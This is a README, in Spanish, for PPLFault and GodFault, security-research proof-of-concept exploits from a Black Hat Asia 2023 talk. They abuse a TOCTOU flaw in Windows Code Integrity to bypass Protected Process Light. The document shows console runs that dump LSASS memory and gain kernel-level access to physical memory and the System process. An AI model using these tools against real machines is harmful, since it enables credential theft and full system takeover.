
Exploit de escalada de privilegios en Windows que abusa de una vulnerabilidad TOCTOU en Code Integrity para evadir Protected Process Light, ejecutarse como WinTcb-Light y volcar procesos protegidos (p. ej., LSASS).
Por Gabriel Landau en Elastic Security.
De PPLdump Is Dead. Long Live PPLdump! presentado en Black Hat Asia 2023.
PPLdump Is Dead. Long Live PPLdump!
ACTUALIZACIÓN 2024-02: Microsoft parcheó PPLFault el 2024-02-13. Consulte este hilo para la discusión relacionada.
Explota un TOCTOU en Code Integrity de Windows para lograr ejecución arbitraria de código como WinTcb-Light y luego volcar un proceso específico. Para más detalles sobre el exploit, consulte mis diapositivas y/o charla.
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe 992 Services 0 76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection
Type Signer
---- ------
ProtectedLight Lsa
PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Dump saved to: lsass.dmp
[+] Dump is 74.9 MB
[+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp
Directory: C:\Users\user\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/1/2023 11:18 AM 78581973 lsass.dmp
Explota el mismo TOCTOU que PPLFault. Sin embargo, en lugar de volcar un proceso, migra a CSRSS y explota una vulnerabilidad en win32k!NtUserHardErrorControlCall de ANGRYORCHARD para decrementar KTHREAD.PreviousMode de UserMode (1) a KernelMode (0). Demuestra el acceso "God Mode" abriendo \Device\PhysicalMemory, normalmente inaccesible desde UserMode, como SECTION_ALL_ACCESS.
C:\Users\user\Desktop>GodFault.exe -v
[?] Server does not appear to be running. Attempting to install it...
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 772
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x1b4
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0
[+] Press any key to continue...
[+] No cleanup necessary. Backup does not exist.
PoC que logra ejecución arbitraria de código como WinTcb-Light sin la API de CloudFilter. Consulte python/README.md.
| Windows 11 22H2 22621.1702 (mayo de 2023) | Windows 11 Insider Canary 25346.1001 (abril de 2023) | |
|---|---|---|
| PPLFault | ✔️ | ✔️ |
| GodFault | ✔️ | ❌ Mitigación de PreviousMode de Insider bugchecks |
PPLFault está cubierto por la licencia ELv2. Utiliza phnt de SystemInformer bajo la licencia MIT.
Inspirado por PPLdump de Clément Labro, que Microsoft parcheó en julio de 2022.
ANGRYORCHARD fue creado por Austin Hudson, quien lo publicó cuando Microsoft parcheó PPLdump.